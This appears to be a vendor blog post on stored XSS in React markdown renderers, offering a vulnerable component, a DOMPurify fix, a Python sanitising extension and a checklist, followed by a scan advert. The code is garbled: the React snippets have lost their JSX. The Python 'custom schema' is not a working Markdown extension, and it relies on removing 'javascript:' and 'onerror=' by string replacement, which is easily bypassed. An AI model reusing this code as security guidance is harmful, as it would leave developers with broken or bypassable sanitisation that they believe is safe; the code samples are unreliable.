Skip to main content
Security Guides

Stored XSS in React Markdown Renderers: How Vibe-Coded Blogs Get Compromised

SecuriSky TeamApril 18, 202612 min read

Introduction to Stored XSS in React Markdown Renderers

Stored XSS attacks occur when an attacker injects malicious code into a web application, which is then stored on the server and executed by the browser when other users access the compromised page. In the context of vibe-coded blogs built with tools like Cursor, Lovable, Bolt, v0, or Replit, stored XSS can be particularly devastating due to the dynamic nature of these applications. The primary vulnerability in these cases often lies in how user-inputted markdown is rendered.

When a user submits markdown text that includes malicious scripts, a vulnerable application may render this text without proper sanitization, leading to the execution of the malicious script. This can happen in React applications that use markdown renderers to display user-generated content. For instance, if a blog built with Replit allows users to create posts using markdown and fails to sanitize the input properly, an attacker could inject JavaScript code that steals user data or takes control of user sessions.

Vulnerable Code Example

Consider a simple React component that renders markdown text without proper sanitization:

import React from 'react';

import ReactMarkdown from 'react-markdown';

const MarkdownRenderer = ({ text }) => {

return {text};

};

export default MarkdownRenderer;

In this example, if text contains malicious JavaScript code wrapped in markdown syntax, it could be executed when rendered.

Understanding the Risk

The risk of stored XSS is not just theoretical; it's a common issue in web applications that do not properly validate and sanitize user input. For developers who rely on tools like Cursor, Lovable, Bolt, v0, or Replit to build their vibe-coded apps, understanding how to mitigate this risk is crucial. One approach is to use libraries that safely render markdown, ensuring that any potentially malicious code is escaped and cannot be executed.

Secure Rendering with DOMPurify

One effective way to sanitize user-inputted markdown and prevent stored XSS attacks is by using a library like DOMPurify. This library can be used in conjunction with markdown rendering libraries to ensure that the output is safe for rendering in the browser. Here's an example of how you might integrate DOMPurify into your markdown rendering component:

import React from 'react';

import ReactMarkdown from 'react-markdown';

import DOMPurify from 'dompurify';

const safeMarkdownRenderer = (text) => {

const cleanText = DOMPurify.sanitize(text); return {cleanText};

};

const MarkdownRenderer = ({ text }) => {

return safeMarkdownRenderer(text);

};

export default MarkdownRenderer;

However, simply sanitizing the input is not enough; you must also ensure that the rendering of the markdown itself does not introduce vulnerabilities. Some markdown libraries have options to escape or sanitize the output, which should be enabled.

Advanced Sanitization with Custom Schemas

For more complex applications, or when dealing with specific types of user input, a custom sanitization schema might be necessary. This involves defining a set of rules that dictate what elements and attributes are allowed in the rendered markdown. For example, you might only allow certain types of links or images to be rendered, blocking any others as potentially malicious.

import html

from markdown import Markdown

Define a custom markdown extension that sanitizes the output

class SanitizingExtension:

def extendMarkdown(self, md): # Sanitize links def sanitize_links(text): # Custom logic to sanitize links return text.replace('javascript:', '') # Sanitize images def sanitize_images(text): # Custom logic to sanitize images return text.replace('onerror=', '') md.postprocessors.register(sanitize_links, 'link_sanitizer', 10) md.postprocessors.register(sanitize_images, 'image_sanitizer', 10)

Use the custom extension

md = Markdown(extensions=[SanitizingExtension()])

safe_text = md.convert(user_input_text)

Conclusion

Stored XSS attacks can compromise even the most secure vibe-coded blogs if the markdown rendering is not properly sanitized. By understanding the risks and implementing secure rendering practices, such as using DOMPurify or defining custom sanitization schemas, developers can significantly reduce the vulnerability of their applications. Tools like SecuriSky can also play a crucial role in detecting these issues automatically, allowing for quicker response times to potential security threats.

Quick Fix Checklist

  • [ ] Validate all user input to prevent malicious scripts from being injected.
  • [ ] Use a library like DOMPurify to sanitize markdown text before rendering.
  • [ ] Implement custom sanitization schemas for advanced use cases.
  • [ ] Regularly audit your application's security with tools like SecuriSky to detect potential vulnerabilities.
  • [ ] Keep all dependencies, including markdown rendering libraries, up to date to ensure you have the latest security patches.
  • Try it free

    Scan your app for these issues now

    Paste your URL and get a full security, performance, and SEO report in under 2 minutes — no signup required.

    Run a free scan
    Stored XSS in React Markdown — SecuriSky Blog